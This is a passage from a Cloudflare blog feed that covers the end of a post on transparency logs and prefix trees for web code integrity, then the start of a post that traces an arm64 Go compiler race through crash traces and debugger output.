    <p>To store all the sites enrolled into transparency, we want a global data structure that maps a site domain to the site log’s chain hash. One efficient way of representing this is a <b>prefix tree</b> (a.k.a., a <i>trie</i>). Every leaf in the tree corresponds to a site’s domain, and its value is the chain hash of that site’s log, the current log size, and the site’s asset host URL. For a site to prove validity of its transparency data, it will have to present an inclusion proof for its leaf. Fortunately, these proofs are efficient for prefix trees.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/26ieMXRdvWIhLKv6J6Cdd7/29814a4a51c8ca8e3279e9b5756d0c67/BLOG-2875_6.png" />
          </figure><p><sub>A prefix tree with four elements. Each leaf’s path corresponds to a domain. Each leaf’s value is the chain hash of its site’s log. </sub></p><p>To add itself to the tree, a site proves possession of its domain to the <b>transparency service</b>, i.e., the party that operates the prefix tree, and provides an asset host URL. To update the entry, the site sends the new entry to the transparency service, which will compute the new chain hash. And to unenroll from transparency, the site just requests to have its entry removed from the tree (an adversary can do this too; we discuss how to detect this below).</p>
    <div>
      <h4>Proving to Witnesses and Browsers</h4>
      <a href="#proving-to-witnesses-and-browsers">
        
      </a>
    </div>
    <p>Now witnesses only need to look at the prefix tree instead of individual site logs, and thus they must verify whole-tree updates. The most important thing to ensure is that every site’s log is append-only. So whenever the tree is updated, it must produce a “proof” containing every new/deleted/modified entry, as well as a consistency proof for each entry showing that the site log corresponding to that entry has been properly appended to. Once the witness has verified this prefix tree update proof, it signs the root.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2bq4UBxoOgKPcysPPxnKD8/9e8c2a8a3b092fffae853b8d477efb07/BLOG-2875_7.png" />
          </figure><p><sub>The sequence of updating a site’s assets and serving the site with transparency enabled.</sub></p><p>The client-side verification procedure is as in the previous section, with two modifications:</p><ol><li><p>The client now verifies two inclusion proofs: one for the integrity policy’s membership in the site log, and one for the site log’s membership in a prefix tree.</p></li><li><p>The client verifies the signature over the prefix tree root, since the witness no longer signs individual chain hashes. As before, the acceptable public keys are whichever witnesses the client trusts.</p></li></ol><p><b>Signaling transparency.</b> Now that there is a single source of truth, namely the prefix tree, a client can know a site is enrolled in transparency by simply fetching the site’s entry in the tree. This alone would work, but it violates our requirement of “no added round trips,” so we instead require that client browsers ship with the list of sites included in the prefix tree. We call this the <b>transparency preload list</b>.</p><p>If a site appears in the preload list, the browser will expect it to provide an inclusion proof in the prefix tree, or else a proof of non-inclusion in a newer version of the prefix tree, thereby showing it has unenrolled. The site must provide one of these proofs until the last preload list it appears in has expired. Finally, even though the preload list is derived from the prefix tree, there is nothing enforcing this relationship. Thus, the preload list should also be published transparently.</p>
    <div>
      <h4>Filling in Missing Properties</h4>
      <a href="#filling-in-missing-properties">
        
      </a>
    </div>
    <p>Remember we still have the requirements of monitorability, opt-out being transparent, and no single point of failure/trust. We fill in those details now.</p><p><b>Adding monitorability.</b> So far, in order for a site operator to ensure their site was not hijacked, they would have to constantly query every transparency service for its domain and verify that it hasn’t been tampered with. This is certainly better than the <a href="https://ct.cloudflare.com/"><u>500k events per hour</u></a> that CT monitors have to ingest, but it still requires the monitor to be constantly polling the prefix tree, and it imposes a constant load for the transparency service.</p><p>We add a field to the prefix tree leaf structure: the leaf now stores a “created” timestamp, containing the time the leaf was created. Witnesses ensure that the “created” field remains the same over all leaf updates (and it is deleted when the leaf is deleted). To monitor, a site operator need only keep the last observed “created” and “log size” fields of its leaf. If it fetches the latest leaf and sees both unchanged, it knows that no changes occurred since the last check.</p><p><b>Adding transparency of opt-out.</b> We must also do the same thing as above for leaf deletions. When a leaf is deleted, a monitor should be able to learn when the deletion occurred within some reasonable time frame. Thus, rather than outright removing a leaf, the transparency service responds to unenrollment requests by replacing the leaf with a <b>tombstone</b> value, containing just a “created” timestamp. 
As before, witnesses ensure that this field remains unchanged until the leaf is permanently deleted (after some visibility period) or re-enrolled.</p><p><b>Permitting multiple transparency services.</b> Since we require that there be no single point of failure or trust, we imagine an ecosystem where there are a handful of non-colluding, reasonably trustworthy transparency service providers, each with their own prefix tree. Like Certificate Transparency (CT), this set should not be too large. It must be small enough that reasonable levels of trust can be established, and so that independent auditors can reasonably handle the load of verifying all of them.</p><p>Ok that’s the end of the most technical part of this post. We’re now going to talk about how to tweak this system to provide all kinds of additional nice properties.</p>
    <div>
      <h2>(Not) Achieving Consistency</h2>
      <a href="#not-achieving-consistency">
        
      </a>
    </div>
    <p>Transparency would be useless if, every time a site updates, it serves 100,000 new versions of itself. Any auditor would have to go through every single version of the code in order to ensure no user was targeted with malware. This is bad even if the velocity of versions is lower. If a site publishes just one new version per week, but every version from the past ten years is still servable, then users can still be served extremely old, potentially vulnerable versions of the site, without anyone knowing. Thus, in order to make transparency valuable, we need <b>consistency</b>, the property that every browser sees the same version of the site at a given time.</p><p>We will not achieve the strongest version of consistency, but it turns out that weaker notions are sufficient for us. If, unlike the above scenario, a site had 8 valid versions of itself at a given time, then that would be pretty manageable for an auditor. So even though it’s true that users don’t all see the same version of the site, they will all still benefit from transparency, as desired.</p><p>We describe two types of inconsistency and how we mitigate them.</p>
    <div>
      <h3>Tree Inconsistency</h3>
      <a href="#tree-inconsistency">
        
      </a>
    </div>
    <p>Tree inconsistency occurs when transparency services’ prefix trees disagree on the chain hash of a site, thus disagreeing on the history of the site. One way to fully eliminate this is to establish a consensus mechanism for prefix trees. A simple one is majority voting: if there are five transparency services, a site must present three tree inclusion proofs to a user, showing the chain hash is present in three trees. This, of course, triples the tree inclusion proof size, and lowers the fault tolerance of the entire system (if three log operators go down, then no transparent site can publish any updates).</p><p>Instead of consensus, we opt to simply limit the amount of inconsistency by limiting the number of transparency services. In 2025, Chrome <a href="https://www.gstatic.com/ct/log_list/v3/log_list.json"><u>trusts</u></a> eight Certificate Transparency logs. A similar number of transparency services would be fine for our system. Plus, it is still possible to detect and prove the existence of inconsistencies between trees, since roots are signed by witnesses. So if it becomes the norm to use the same version on all trees, then social pressure can be applied when sites violate this.</p>
    <div>
      <h3>Temporal Inconsistency</h3>
      <a href="#temporal-inconsistency">
        
      </a>
    </div>
    <p>Temporal inconsistency occurs when a user gets a newer or older version of the site (both still unexpired), depending on some external factors such as geographic location or cookie values. In the extreme, as stated above, if a signed prefix root is valid for ten years, then a site can serve a user any version of the site from the last ten years.</p><p>As with tree inconsistency, this can be resolved using consensus mechanisms. If, for example, the latest manifest were published on a blockchain, then a user could fetch the latest blockchain head and ensure they got the latest version of the site. However, this incurs an extra network round trip for the client, and requires sites to wait for their hash to get published on-chain before they can update. More importantly, building this kind of consensus mechanism into our specification would drastically increase its complexity. We’re aiming for v1.0 here.</p><p>We mitigate temporal inconsistency by requiring reasonably short validity periods for witness signatures. Making prefix root signatures valid for, e.g., one week would drastically limit the number of simultaneously servable versions. The cost is that site operators must now query the transparency service at least once a week for the new signed root and inclusion proof, even if nothing in the site changed. The sites cannot skip this, and the transparency service must be able to handle this load. This parameter must be tuned carefully.</p>
    <div>
      <h2>Beyond Integrity, Consistency, and Transparency</h2>
      <a href="#beyond-integrity-consistency-and-transparency">
        
      </a>
    </div>
    <p>Providing integrity, consistency, and transparency is already a huge endeavor, but there are some additional app store-like security features that can be integrated into this system without too much work.</p>
    <div>
      <h3>Code Signing</h3>
      <a href="#code-signing">
        
      </a>
    </div>
    <p>One problem that WAICT doesn’t solve is that of <i>provenance</i>: where did the code the user is running come from, precisely? In settings where audits of code happen frequently, this is not so important, because some third party will be reading the code regardless. But for smaller self-hosted deployments of open-source software, this may not be viable. For example, if Alice hosts her own version of <a href="https://cryptpad.org/"><u>Cryptpad</u></a> for her friend Bob, how can Bob be sure the code matches the real code in Cryptpad’s Github repo?</p><p><b>WEBCAT.</b> The folks at the Freedom of Press Foundation (FPF) have built a solution to this, called <a href="https://securedrop.org/news/introducing-webcat-web-based-code-assurance-and-transparency/"><u>WEBCAT</u></a>. This protocol allows site owners to announce the identities of the developers that have signed the site’s integrity manifest, i.e., have signed all the code and other assets that the site is serving to the user. Users with the WEBCAT plugin can then see the developer’s <a href="https://www.sigstore.dev/"><u>Sigstore</u></a> signatures, and trust the code based on that.</p><p>We’ve made WAICT extensible enough to fit WEBCAT inside and benefit from the transparency components. Concretely, we permit manifests to hold additional metadata, which we call <b>extensions</b>. In this case, the extension holds a list of developers’ Sigstore identities. To be useful, browsers must expose an API for browser plugins to access these extension values. With this API, independent parties can build plugins for whatever feature they wish to layer on top of WAICT.</p>
    <div>
      <h2>Cooldown</h2>
      <a href="#cooldown">
        
      </a>
    </div>
    <p>So far we have not built anything that can prevent attacks in the moment. An attacker who breaks into a website can still delete any code-signing extensions, or just unenroll the site from transparency entirely, and continue with their attack as normal. The unenrollment will be logged, but the malicious code will not be, and by the time anyone sees the unenrollment, it may be too late.</p><p>To prevent spontaneous unenrollment, we can enforce <b>unenrollment cooldown</b> client-side. Suppose the cooldown period is 24 hours. Then the rule is: if a site appears on the preload list, then the client will require that either 1) the site have transparency enabled, or 2) the site have a tombstone entry that is at least 24 hours old. Thus, an attacker will be forced to either serve a transparency-enabled version of the site, or serve a broken site for 24 hours.</p><p>Similarly, to prevent spontaneous extension modifications, we can enforce <b>extension cooldown</b> on the client. We will take code signing as an example, saying that any change in developer identities requires a 24 hour waiting period to be accepted. First, we require that extension <code>dev-ids</code> has a preload list of its own, letting the client know which sites have opted into code signing (if a preload list doesn’t exist then any site can delete the extension at any time). The client rule is as follows: if the site appears in the preload list, then both 1) <code>dev-ids</code> must exist as an extension in the manifest, and 2) <code>dev-ids-inclusion</code> must contain an inclusion proof showing that the current value of dev-ids was in a prefix tree that is at least 24 hours old. With this rule, a client will reject values of <code>dev-ids</code> that are newer than a day. 
If a site wants to delete <code>dev-ids</code>, they must 1) request that it be removed from the preload list, and 2) in the meantime, replace the dev-ids value with the empty string and update <code>dev-ids-inclusion</code> to reflect the new value.</p>
    <div>
      <h2>Deployment Considerations</h2>
      <a href="#deployment-considerations">
        
      </a>
    </div>
    <p>There are a lot of distinct roles in this ecosystem. Let’s sketch out the trust and resource requirements for each role.</p><p><b>Transparency service.</b> These parties store metadata for every transparency-enabled site on the web. If there are 100 million domains, and each entry is 256B each (a few hashes, plus a URL), this comes out to 26GB for a single tree, not including the intermediate hashes. To prevent size blowup, there would probably have to be a pruning rule that unenrolls sites after a long inactivity period. Transparency services should have largely uncorrelated downtime, since, if all services go down, no transparency-enabled site can make any updates. Thus, transparency services must have a moderate amount of storage, be relatively highly available, and have downtime periods uncorrelated with each other.</p><p>Transparency services require some trust, but their behavior is narrowly constrained by witnesses. Theoretically, a service can replace any leaf’s chain hash with its own, and the witness will validate it (as long as the consistency proof is valid). But such changes are detectable by anyone that monitors that leaf.</p><p><b>Witness.</b> These parties verify prefix tree updates and sign the resulting roots. Their storage costs are similar to that of a transparency service, since they must keep a full copy of a prefix tree for every transparency service they witness. Also like the transparency services, they must have high uptime. Witnesses must also be trusted to keep their signing key secret for a long period of time, at least long enough to permit browser trust stores to be updated when a new key is created.</p><p><b>Asset host.</b> These parties carry little trust. They cannot serve bad data, since any query response is hashed and compared to a known hash. The only malicious behavior an asset host can do is refuse to respond to queries. 
Asset hosts can also do this by accident due to downtime.</p><p><b>Client.</b> This is the most trust-sensitive part. The client is the software that performs all the transparency and integrity checks. This is, of course, the web browser itself. We must trust this.</p><p>We at Cloudflare would like to contribute what we can to this ecosystem. It should be possible to run both a transparency service and a witness. Of course, our witness should not witness our own transparency service. Rather, we can witness other organizations’ transparency services, and our transparency service can be witnessed by other organizations.</p>
    <div>
      <h3>Supporting Alternate Ecosystems</h3>
      <a href="#supporting-alternate-ecosystems">
        
      </a>
    </div>
    <p>WAICT should be compatible with non-standard ecosystems, ones where the large players do not really exist, or at least not in the way they usually do. We are working with the FPF on defining transparency for alternate ecosystems with different network and trust environments. The primary example we have is that of the Tor ecosystem.</p><p>A paranoid Tor user may not trust existing transparency services or witnesses, and there might not be any other trusted party with the resources to self-host these functionalities. For this use case, it may be reasonable to put the <a href="https://github.com/freedomofpress/webcat-infra-chain"><u>prefix tree on a blockchain somewhere</u></a>. This makes the usual domain validation impossible (there’s no validator server to speak of), but this is fine for onion services. Since an onion address is just a public key, a signature is sufficient to prove ownership of the domain.</p><p>One consequence of a consensus-backed prefix tree is that witnesses are now unnecessary, and there is only need for the single, canonical, transparency service. This mostly solves the problems of tree inconsistency at the expense of latency of updates.</p>
    <div>
      <h2>Next Steps</h2>
      <a href="#next-steps">
        
      </a>
    </div>
    <p>We are still very early in the standardization process. One of the more immediate next steps is to get subresource integrity working for more data types, particularly WASM and images. After that, we can begin standardizing the integrity manifest format. And then after that we can start standardizing all the other features. We intend to work on this specification hand-in-hand with browsers and the IETF, and we hope to have some exciting betas soon.</p><p>In the meantime, you can follow along with our <a href="https://github.com/rozbb/draft-waict-transparency"><u>transparency specification draft</u></a>, check out the open problems, and share your ideas. Pull requests and issues are always welcome!</p>
    <div>
      <h2>Acknowledgements</h2>
      <a href="#acknowledgements">
        
      </a>
    </div>
    <p>Many thanks to Dennis Jackson from Mozilla for the lengthy back-and-forth meetings on design, to Giulio B and Cory Myers from FPF for their immensely helpful influence and feedback, and to Richard Hansen for great feedback.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Malicious JavaScript]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Cryptography]]></category>
            <category><![CDATA[Research]]></category>
            <guid isPermaLink="false">6GRxDReQHjD7T0xpfjf7Iq</guid>
            <dc:creator>Michael Rosenberg</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we found a bug in Go's arm64 compiler]]></title>
            <link>https://blog.cloudflare.com/how-we-found-a-bug-in-gos-arm64-compiler/</link>
            <pubDate>Wed, 08 Oct 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ 84 million requests a second means even rare bugs appear often. We'll reveal how we discovered a race condition in the Go arm64 compiler and got it fixed. ]]></description>
            <content:encoded><![CDATA[ <p>Every second, 84 million HTTP requests hit Cloudflare across our fleet of data centers in 330 cities. At that scale, even the rarest of bugs can show up frequently. In fact, it was our scale that recently led us to discover a bug in Go's arm64 compiler that causes a race condition in the generated code.</p><p>This post breaks down how we first encountered the bug, investigated it, and ultimately tracked it down to its root cause.</p>
    <div>
      <h2>Investigating a strange panic</h2>
      <a href="#investigating-a-strange-panic">
        
      </a>
    </div>
    <p>We run a service in our network which configures the kernel to handle traffic for some products like <a href="https://www.cloudflare.com/network-services/products/magic-transit/"><u>Magic Transit</u></a> and <a href="https://www.cloudflare.com/network-services/products/magic-wan/"><u>Magic WAN</u></a>. Our monitoring watches this closely, and it started to observe very sporadic panics on arm64 machines.</p><p>We first saw one with a fatal error stating that <a href="https://github.com/golang/go/blob/c0ee2fd4e309ef0b8f4ab6f4860e2626c8e00802/src/runtime/traceback.go#L566"><u>traceback did not unwind completely</u></a>. That error suggests that invariants were violated when traversing the stack, likely because of stack corruption. After a brief investigation we decided that it was probably rare stack memory corruption. This was a largely idle control plane service where unplanned restarts have negligible impact, and so we felt that following up was not a priority unless it kept happening.</p><p>And then it kept happening. </p>
    <div>
      <h4>Coredumps per hour</h4>
      <a href="#coredumps-per-hour">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7ohMD2ph3I9l7lbZQWZ4xl/243e679d8293565fc6a55a670c9f3583/BLOG-2906_2.png" />
          </figure><p>When we first saw this bug, we noticed that the fatal errors correlated with recovered panics. These were caused by some old code that used panic/recover as error handling.</p><p>At this point, our theory was: </p><ol><li><p>All of the fatal panics happen within stack unwinding.</p></li><li><p>We correlated an increased volume of recovered panics with these fatal panics.</p></li><li><p>Recovering a panic unwinds goroutine stacks to call deferred functions.</p></li><li><p>A related <a href="https://github.com/golang/go/issues/73259"><u>Go issue (#73259)</u></a> reported an arm64 stack unwinding crash.</p></li><li><p>Let’s stop using panic/recover for error handling and wait out the upstream fix?</p></li></ol><p>So we did that and watched as fatal panics stopped occurring as the release rolled out. Fatal panics gone, our theoretical mitigation seemed to work, and this was no longer our problem. We subscribed to the upstream issue so we could update when it was resolved and put it out of our minds.</p><p>But this turned out to be a much stranger bug than expected. Putting it out of our minds was premature, as the same class of fatal panics came back at a much higher rate. A month later, we were seeing up to 30 daily fatal panics with no real discernible cause; while that might account for only one machine a day in less than 10% of our data centers, we found it concerning that we didn’t understand the cause. The first thing we checked was the number of recovered panics, to match our previous pattern, but there were none. More interestingly, we could not correlate this increased rate of fatal panics with anything. A release? Infrastructure changes? The position of Mars?</p><p>At this point we felt like we needed to dive deeper to better understand the root cause. Pattern matching and hoping was clearly insufficient.</p><p>We saw two classes of this bug – a crash while accessing invalid memory and an explicitly checked fatal error.</p>
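<p>For readers unfamiliar with the pattern we removed, here is a minimal, hypothetical example of panic/recover used as error handling (the names are ours, not our service’s code). The key detail for this story is that recovering a panic unwinds the goroutine’s stack to run deferred functions – the very code path the fatal panics implicated.</p>

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
)

// mustParsePort panics on bad input: the "panic as error handling" style.
func mustParsePort(s string) int {
	n, err := strconv.Atoi(s)
	if err != nil || n < 1 || n > 65535 {
		panic(fmt.Sprintf("bad port %q", s))
	}
	return n
}

// parsePort converts the panic back into an error at the top of the call
// stack. The recover() forces the runtime to unwind the goroutine's stack.
func parsePort(s string) (port int, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = errors.New(fmt.Sprint(r))
		}
	}()
	return mustParsePort(s), nil
}

func main() {
	if _, err := parsePort("no-such-port"); err != nil {
		fmt.Println("recovered into an error:", err)
	}
	p, _ := parsePort("443")
	fmt.Println("parsed:", p)
}
```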
    <div>
      <h4>Fatal Error</h4>
      <a href="#fatal-error">
        
      </a>
    </div>
    
            <pre><code>runtime: g8221077: frame.sp=0x4015d784c0 top=0x4015d89fd0
       stack=[0x4015d6a000-0x4015d8a000]
fatal error: traceback did not unwind completely

runtime stack:
runtime.throw({0x55558de6aa27?, 0x7ff97fffe638?})
       /usr/local/go/src/runtime/panic.go:1073 +0x38 fp=0x7ff97fffe490 sp=0x7ff97fffe460 pc=0x55558d403388
runtime.(*unwinder).finishInternal(0x7ff97fffe4f8?)
       /usr/local/go/src/runtime/traceback.go:566 +0x110 fp=0x7ff97fffe4d0 sp=0x7ff97fffe490 pc=0x55558d3eed40
runtime.(*unwinder).next(0x7ff97fffe5b0?)
       /usr/local/go/src/runtime/traceback.go:447 +0x2ac fp=0x7ff97fffe560 sp=0x7ff97fffe4d0 pc=0x55558d3eeb7c
runtime.scanstack(0x4014494380, 0x400005bc50)
       /usr/local/go/src/runtime/mgcmark.go:887 +0x290 fp=0x7ff97fffe6a0 sp=0x7ff97fffe560 pc=0x55558d3acaa0
runtime.markroot.func1()
       /usr/local/go/src/runtime/mgcmark.go:238 +0xa8 fp=0x7ff97fffe6f0 sp=0x7ff97fffe6a0 pc=0x55558d3ab578
runtime.markroot(0x400005bc50, 0x17e6, 0x1)
       /usr/local/go/src/runtime/mgcmark.go:212 +0x1c8 fp=0x7ff97fffe7a0 sp=0x7ff97fffe6f0 pc=0x55558d3ab248
runtime.gcDrain(0x400005bc50, 0x7)
       /usr/local/go/src/runtime/mgcmark.go:1188 +0x434 fp=0x7ff97fffe810 sp=0x7ff97fffe7a0 pc=0x55558d3ad514
runtime.gcDrainMarkWorkerIdle(...)
       /usr/local/go/src/runtime/mgcmark.go:1102
runtime.gcBgMarkWorker.func2()
       /usr/local/go/src/runtime/mgc.go:1508 +0x68 fp=0x7ff97fffe860 sp=0x7ff97fffe810 pc=0x55558d3a9408
runtime.systemstack(0x0)
       /usr/local/go/src/runtime/asm_arm64.s:244 +0x6c fp=0x7ff97fffe870 sp=0x7ff97fffe860 pc=0x55558d4098fc

goroutine 153 gp=0x4000105340 m=324 mp=0x400639ea08 [GC worker (active)]:</code></pre>
            <p></p>
    <div>
      <h4>Segmentation fault</h4>
      <a href="#segmentation-fault">
        
      </a>
    </div>
    
            <pre><code>SIGSEGV: segmentation violation
PC=0x55557e2bea58 m=13 sigcode=1 addr=0x118

goroutine 0 gp=0x40003af880 m=13 mp=0x40003ca008 [idle]:
runtime.(*unwinder).next(0x7fff2afde5b0)
       /usr/local/go/src/runtime/traceback.go:458 +0x188 fp=0x7fff2afde560 sp=0x7fff2afde4d0 pc=0x55557e2bea58
runtime.scanstack(0x40042cc000, 0x4000059750)
       /usr/local/go/src/runtime/mgcmark.go:887 +0x290 fp=0x7fff2afde6a0 sp=0x7fff2afde560 pc=0x55557e27caa0
runtime.markroot.func1()
       /usr/local/go/src/runtime/mgcmark.go:238 +0xa8 fp=0x7fff2afde6f0 sp=0x7fff2afde6a0 pc=0x55557e27b578
runtime.markroot(0x4000059750, 0xb8, 0x1)
       /usr/local/go/src/runtime/mgcmark.go:212 +0x1c8 fp=0x7fff2afde7a0 sp=0x7fff2afde6f0 pc=0x55557e27b248
runtime.gcDrain(0x4000059750, 0x3)
       /usr/local/go/src/runtime/mgcmark.go:1188 +0x434 fp=0x7fff2afde810 sp=0x7fff2afde7a0 pc=0x55557e27d514
runtime.gcDrainMarkWorkerDedicated(...)
       /usr/local/go/src/runtime/mgcmark.go:1112
runtime.gcBgMarkWorker.func2()
       /usr/local/go/src/runtime/mgc.go:1489 +0x94 fp=0x7fff2afde860 sp=0x7fff2afde810 pc=0x55557e279434
runtime.systemstack(0x0)
       /usr/local/go/src/runtime/asm_arm64.s:244 +0x6c fp=0x7fff2afde870 sp=0x7fff2afde860 pc=0x55557e2d98fc

goroutine 187 gp=0x40003aea80 m=13 mp=0x40003ca008 [GC worker (active)]:</code></pre>
            <p></p><p>Now we could observe some clear patterns. Both errors occur when unwinding the stack in <code>(*unwinder).next</code>. In one case we saw an intentional<a href="https://github.com/golang/go/blob/b3251514531123d7fd007682389bce7428d159a0/src/runtime/traceback.go#L566"> <u>fatal error</u></a> as the runtime identified that unwinding could not complete and the stack was in a bad state. In the other case there was a direct memory access error that happened while trying to unwind the stack. The segfault was discussed in the <a href="https://github.com/golang/go/issues/73259#issuecomment-2786818812"><u>GitHub issue</u></a> and a Go engineer identified it as a dereference of a Go scheduler struct, <a href="https://github.com/golang/go/blob/924fe98902cdebf20825ab5d1e4edfc0fed2966f/src/runtime/runtime2.go#L536"><u>m</u></a>, when<a href="https://github.com/golang/go/blob/b3251514531123d7fd007682389bce7428d159a0/src/runtime/traceback.go#L458"> <u>unwinding</u></a>.</p>
    <div>
      <h3>A review of Go scheduler structs</h3>
      <a href="#a-review-of-go-scheduler-structs">
        
      </a>
    </div>
    <p>Go uses a lightweight userspace scheduler to manage concurrency. Many goroutines are scheduled on a smaller number of kernel threads – this is often referred to as M:N scheduling. Any individual goroutine can be scheduled on any kernel thread. The scheduler has three core types – <a href="https://github.com/golang/go/blob/924fe98902cdebf20825ab5d1e4edfc0fed2966f/src/runtime/runtime2.go#L394"><code><u>g</u></code></a> (the goroutine), <a href="https://github.com/golang/go/blob/924fe98902cdebf20825ab5d1e4edfc0fed2966f/src/runtime/runtime2.go#L536"><code><u>m</u></code></a> (the kernel thread, or “machine”), and <a href="https://github.com/golang/go/blob/924fe98902cdebf20825ab5d1e4edfc0fed2966f/src/runtime/runtime2.go#L644"><code><u>p</u></code></a> (the physical execution context, or “processor”). For a goroutine to be scheduled, a free <code>m</code> must acquire a free <code>p</code>, which will then execute the <code>g</code>. Each <code>g</code> contains a field for its <code>m</code> if it is currently running; otherwise it will be <b>nil</b>. This is all the context needed for this post, but the <a href="https://github.com/golang/go/blob/master/src/runtime/HACKING.md#gs-ms-ps"><u>Go runtime docs</u></a> explore this more comprehensively.</p><p>At this point we can start to make inferences on what’s happening: the program crashes because we try to unwind a goroutine stack that is invalid. In the first backtrace, if a <a href="https://github.com/golang/go/blob/b3251514531123d7fd007682389bce7428d159a0/src/runtime/traceback.go#L446"><u>return address is null, we call </u><code><u>finishInternal</u></code><u> and abort because the stack was not fully unwound</u></a>. The segmentation fault case in the second backtrace is a bit more interesting: if instead the return address is non-zero but not a function, then the unwinder code assumes that the goroutine is currently running. It'll then dereference <code>m</code> and fault by accessing <code>m.incgo</code> (the offset of <code>incgo</code> into <code>struct m</code> is 0x118, the faulting memory access).</p><p>What, then, is causing this corruption? The traces were difficult to get anything useful from – our service has hundreds if not thousands of active goroutines. It was fairly clear from the beginning that the panic was remote from the actual bug. The crashes were all observed while unwinding the stack, and if this were an issue any time the stack was unwound on arm64, we would be seeing it in many more services. We felt pretty confident that the stack unwinding was happening correctly but on an invalid stack.</p><p>Our investigation stalled for a while at this point – making guesses, testing guesses, trying to infer if the panic rate went up or down, or if nothing changed. There was <a href="https://github.com/golang/go/issues/73259"><u>a known issue</u></a> on Go’s GitHub issue tracker which matched our symptoms almost exactly, but what they discussed was mostly what we already knew. At some point when looking through the linked stack traces we realized that their crash referenced an old version of a library that we were also using – Go Netlink.</p>
            <pre><code>goroutine 1267 gp=0x4002a8ea80 m=nil [runnable (scan)]:
runtime.asyncPreempt2()
        /usr/local/go/src/runtime/preempt.go:308 +0x3c fp=0x4004cec4c0 sp=0x4004cec4a0 pc=0x46353c
runtime.asyncPreempt()
        /usr/local/go/src/runtime/preempt_arm64.s:47 +0x9c fp=0x4004cec6b0 sp=0x4004cec4c0 pc=0x4a6a8c
github.com/vishvananda/netlink/nl.(*NetlinkSocket).Receive(0x14360300000000?)
        /go/pkg/mod/github.com/!data!dog/netlink@v1.0.1-0.20240223195320-c7a4f832a3d1/nl/nl_linux.go:803 +0x130 fp=0x4004cfc710 sp=0x4004cec6c0 pc=0xf95de0
</code></pre>
            <p></p><p>We spot-checked a few stack traces and confirmed the presence of this Netlink library. Querying our logs showed that not only did we share a library – every single segmentation fault we observed had happened while preempting<a href="https://github.com/vishvananda/netlink/blob/e1e260214862392fb28ff72c9b11adc84df73e2c/nl/nl_linux.go#L880"> <code><u>NetlinkSocket.Receive</u></code></a>.</p>
    <div>
      <h3>What’s (async) preemption?</h3>
      <a href="#whats-async-preemption">
        
      </a>
    </div>
    <p>In the prehistoric era of Go (&lt;=1.13) the runtime was cooperatively scheduled. A goroutine would run until it decided it was ready to yield to the scheduler – usually due to explicit calls to <code>runtime.Gosched()</code> or injected yield points at function calls/IO operations. Since<a href="https://go.dev/doc/go1.14#runtime"> <u>Go 1.14</u></a> the runtime instead does async preemption. The Go runtime has a thread, <code>sysmon</code>, which tracks how long each goroutine has been running and will preempt any that run for longer than 10ms (at time of writing). It does this by sending <code>SIGURG</code> to the OS thread; the signal handler then modifies the program counter and stack to mimic a call to <code>asyncPreempt</code>.</p><p>At this point we had two broad theories:</p><ul><li><p>This is a Go Netlink bug – likely due to <code>unsafe.Pointer</code> usage which invokes undefined behavior but only actually breaks on arm64</p></li><li><p>This is a Go runtime bug and we're only triggering it in <code>NetlinkSocket.Receive</code> for some reason</p></li></ul><p>After finding the same bug publicly reported upstream, we were feeling confident this was caused by a Go runtime bug. However, upon seeing that both issues implicated the same function, we felt more skeptical – notably, the Go Netlink library uses <code>unsafe.Pointer</code>, so memory corruption was a plausible explanation even if we didn't understand why.</p><p>After an unsuccessful code audit we had hit a wall. The crashes were rare and remote from the root cause. Maybe these crashes were caused by a runtime bug, maybe they were caused by a Go Netlink bug. It seemed clear that there was something wrong with this area of the code, but code auditing wasn’t going anywhere.</p>
    <div>
      <h2>Breakthrough</h2>
      <a href="#breakthrough">
        
      </a>
    </div>
    <p>At this point we had a fairly good understanding of what was crashing but very little understanding of <b>why</b> it was happening. It was clear that the root cause of the stack unwinder crashing was remote from the actual crash, and that it had to do with <code>(*NetlinkSocket).Receive</code>, but why? We were able to capture a <b>core dump</b> of a production crash and view it in a debugger. The backtrace confirmed what we already knew – that there was a segmentation fault when unwinding a stack. The crux of the issue revealed itself when we looked at the goroutine which had been preempted while calling <code>(*NetlinkSocket).Receive</code>.</p>
            <pre><code>(dlv) bt
0  0x0000555577579dec in runtime.asyncPreempt2
   at /usr/local/go/src/runtime/preempt.go:306
1  0x00005555775bc94c in runtime.asyncPreempt
   at /usr/local/go/src/runtime/preempt_arm64.s:47
2  0x0000555577cb2880 in github.com/vishvananda/netlink/nl.(*NetlinkSocket).Receive
   at
/vendor/github.com/vishvananda/netlink/nl/nl_linux.go:779
3  0x0000555577cb19a8 in github.com/vishvananda/netlink/nl.(*NetlinkRequest).Execute
   at 
/vendor/github.com/vishvananda/netlink/nl/nl_linux.go:532
4  0x0000555577551124 in runtime.heapSetType
   at /usr/local/go/src/runtime/mbitmap.go:714
5  0x0000555577551124 in runtime.heapSetType
   at /usr/local/go/src/runtime/mbitmap.go:714
...
(dlv) disass -a 0x555577cb2878 0x555577cb2888
TEXT github.com/vishvananda/netlink/nl.(*NetlinkSocket).Receive(SB) /vendor/github.com/vishvananda/netlink/nl/nl_linux.go
        nl_linux.go:779 0x555577cb2878  fdfb7fa9        LDP -8(RSP), (R29, R30)
        nl_linux.go:779 0x555577cb287c  ff430191        ADD $80, RSP, RSP
        nl_linux.go:779 0x555577cb2880  ff434091        ADD $(16&lt;&lt;12), RSP, RSP
        nl_linux.go:779 0x555577cb2884  c0035fd6        RET
</code></pre>
            <p></p><p>The goroutine was paused between two opcodes in the function epilogue. Since the process of unwinding a stack relies on the stack frame being in a consistent state, it felt immediately suspicious that we preempted in the middle of adjusting the stack pointer. The goroutine had been paused at <code>0x555577cb2880</code>, between <code>ADD $80, RSP, RSP</code> and <code>ADD $(16&lt;&lt;12), RSP, RSP</code>.</p><p>We queried the service logs to confirm our theory. This wasn’t isolated – the majority of stack traces showed that this same opcode was preempted. This was no longer a weird production crash we couldn’t reproduce. A crash happened when the Go runtime preempted between these two stack pointer adjustments. We had our smoking gun.</p>
    <div>
      <h2>Building a minimal reproducer</h2>
